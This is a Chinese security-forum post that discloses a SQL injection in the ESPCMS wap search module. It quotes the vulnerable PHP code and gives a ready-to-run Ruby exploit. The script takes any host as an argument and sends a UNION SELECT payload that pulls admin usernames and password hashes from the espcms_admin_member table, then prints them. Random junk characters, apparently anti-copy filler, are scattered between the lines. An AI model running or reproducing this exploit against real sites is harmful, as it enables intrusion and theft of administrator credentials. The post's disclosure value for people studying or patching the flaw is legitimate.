中国网络渗透测试联盟
标题:
espcms wap模块搜索处SQL注入
[打印本页]
作者:
admin
时间:
2013-7-27 18:31
标题:
espcms wap模块搜索处SQL注入
0×0 漏洞概述0×1 漏洞细节
+ n' _6 n# b( B
0×2 PoC
9 C, R4 B2 p# A8 B
4 u, `% _) s! c! O
2 W8 u6 U( D1 K/ p; @& ~
$ r- \. Y9 T9 b% d. o
0×0 漏洞概述
6 w1 p# |/ J- K, O
2 V: y: {% I |, Y4 c
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
. F+ h/ g' W- d% r0 q1 ?
其在处理传入的参数时考虑不严谨导致
SQL注入
发生
' i# b7 I* f2 q: P/ `* q
3 X4 J6 z+ t9 U0 z7 g
; Z9 g; m& U p7 K( W
0×1 漏洞细节
0 M. d, s! ]! z6 A) \7 P4 g. x
% }$ c( Z O; Q7 y$ V
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
2 G3 y; |8 K# E
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
, Y/ e3 g1 l5 N- C. ^& x; _
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的
SQL注入
。
q, C" D. u* ^6 _+ Z; O$ O1 h
4 s! C+ I. l0 h% I
在/interface/3gwap_search.php文件的in_result函数中:
+ u7 t" z. h! H) ]% ?
( v: V$ D+ o6 K. e
# |$ N3 J3 S( Z6 ~& m# O. I
. z+ Q" r3 Z8 T) M2 f% ]
function in_result() {
" G+ p( F% k6 Z
... ... ... ... ... ... ... ... ...
: f, G0 T+ s/ G5 x& s5 w5 o
$urlcode = $_SERVER[ 'QUERY_STRING '];
; y1 \0 b9 d" ]9 V
parse_str(html_entity_decode($urlcode), $output);
$ ^5 l/ K9 h, L+ w- B* C
; G1 p/ Y( X% e; U; i
... ... ... ... ... ... ... ... ...
" S/ \/ B2 D. ?" ]
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
: |* E* q3 J6 q- J; P: q# F
- x' z. E s) F3 z, @
$db_table = db_prefix . 'model_att';
% a1 Z4 M: p: W5 g+ W" B
( H+ W6 |. c6 s) U1 r
foreach ($output['attr' ] as $key => $value) {
" c. {3 i' E# N8 d; F9 A
if ($value) {
0 q( g1 |/ R. u2 _3 s
5 X& ]" Q6 v0 T5 H
$key = addslashes($key);
# l' `# ~$ i# M. O% t9 e+ I, h
$key = $this-> fun->inputcodetrim($key);
i' J6 _# T# E
$db_att_where = " WHERE isclass=1 AND attrname='$key'";
, a' j z0 g+ R7 Y7 b5 d6 M
$countnum = $this->db_numrows($db_table, $db_att_where);
- O8 T; x# B8 b& r
if ($countnum > 0) {
L6 J' d( E5 l2 e' B+ t6 u
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
' C: `& |/ T' h6 A* y- [- t9 u
}
3 y( Q/ w4 C9 |5 r4 {; T8 R
}
" j" _2 m3 {: F
}
1 G& H) y F7 B4 g# j0 ?- j
}
# Y" L# R5 C0 d2 v7 `
if (!empty ($keyword) && empty($keyname)) {
6 p; h) `) p2 M6 x' J+ B
$keyname = 'title';
, Q7 _9 y( D7 j
$db_where.= " AND a.title like '%$keyword%'" ;
9 H l0 }* x" e& q
} elseif (!empty ($keyword) && !empty($keyname)) {
' X% K* K6 i/ P2 u8 t2 x
$db_where.= " AND $keyname like '% $keyword%'";
4 p( Y, W3 [0 n2 G) l* x
}
5 |0 L; K! g0 m3 i% I: P% _# a5 H% R
$pagemax = 15;
) L$ \# S! |, t3 h0 c, y
) l, x0 g: d. ]: A$ W( @
$pagesylte = 1;
/ b2 S0 X4 B) o+ P. N
4 Q. m1 @! B6 y$ d4 b, m6 r7 d1 ~
if ($countnum > 0) {
& o- Z' A6 |( e9 D9 ]/ g
4 M }2 I# [. A/ R8 ^
$numpage = ceil($countnum / $pagemax);
# @4 }8 b! Q" F7 h' V6 ]
} else {
$ U: B! I, U: M) q. V2 K R1 Q
$numpage = 1;
) B& y2 S' b' P/ z
}
, s/ I# b Y7 t
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
0 c7 d4 Q9 B0 q$ Q0 h
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
+ D, E: @! R: p3 E
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
3 Y* U4 c0 C0 U; _4 j, {, p5 O
... ... ... ... ... ... ... ... ...
+ o& E" p( j: y2 G& U3 p
}
' W: \( L: Y: i. i+ w! l% p
7 ]' j/ n0 C, |
! I5 ?( ~+ C" @
0×2 PoC
1 ~+ I+ H- D( R8 y0 c2 R, J& K
8 `4 C l* Y( d" ]- y2 c
# \. C! V1 D8 B" K
6 e' _6 l, W/ |0 E3 U
require "net/http"
4 ^, H. G3 t* q3 @" ?" a8 I9 j
2 _/ ]0 W* z& J
def request(method, url)
7 E! J6 O$ J9 r6 c: U
if method.eql?("get")
- A8 Q i2 Y/ u8 s' v* w
uri = URI.parse(url)
7 h1 _& D1 x4 a, H! y5 ?
http = Net::HTTP.new(uri.host, uri.port)
+ ^9 {; G9 {' o* G% N. {. p
response = http.request(Net::HTTP::Get.new(uri.request_uri))
- n7 Z% q7 n- C0 w% `5 _( |
return response
; v& l! c9 m+ i& I( y: V
end
/ G: ^7 k3 C0 o" c. @/ K9 A9 I
end
6 ^7 n2 f$ t4 H+ S
; w( R6 C% m4 p$ X
doc =<<HERE
: R' D' X W4 N9 O* [' B
-------------------------------------------------------
; q0 `: `4 m3 R: x) t
Espcms Injection Exploit
% V& `8 l* n! z7 S+ i6 L
Author:ztz
/ X2 N7 M% s( H8 d1 \
Blog:
http://ztz.fuzzexp.org/
; T( x/ h- r; }! P
-------------------------------------------------------
- M2 J+ m/ @# Y1 G% @
9 C! R V2 C0 V- g! f7 Z0 z
HERE
, L! k4 s5 [4 d5 W z( k$ O2 x/ R- r
# G- i7 d$ w5 m% j U1 P6 `
usage =<<HERE
( `/ m) j, j8 i6 d9 q+ E0 U
Usage: ruby #{$0} host port path
$ q6 s" K4 D# x9 {. e' H
example: ruby #{$0}
www.target.com
80 /
9 M) v4 m% ~; t3 b% W+ G
HERE
5 ~! }8 W& s; I
B u |4 N9 }% T: v! x# f
puts doc
+ ?$ U# Y, @* F+ B% r0 _% |( s9 k
if ARGV.length < 3
$ m& v t" V$ f
puts usage
" x% p4 K* ~/ \* @" `
else
1 [" N2 q- g, Y. V$ \9 u- @- ?
$host = ARGV[0]
) F+ b7 u, o/ P+ _* {; e, ]9 _
$port = ARGV[1]
! ~% A2 j; p C& A1 z4 ?
$path = ARGV[2]
2 l2 }! C& ^, p% b* F( e' N
; e3 V4 e' b+ y1 c0 G
puts "
send request..."
8 L2 _$ r+ Q7 U8 t2 [
url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
3 q8 m9 V" u7 @, A
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
" F5 H1 d; M1 X. V: i
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
. X' F# `3 F3 Z( K9 J2 [& o
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
' _. h& l, t8 I( `) G0 i
response = request("get", url)
# z4 |$ \3 A% g" p
result = response.body.scan(/\w+&\w{32}/)
: y) p) j; I2 i/ O" Y
puts result
8 q9 ~2 m6 r% A7 O3 ^$ V
end
: H8 K2 B/ Q' h* y- w! G8 m0 V
2 \* @# t2 T" E
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2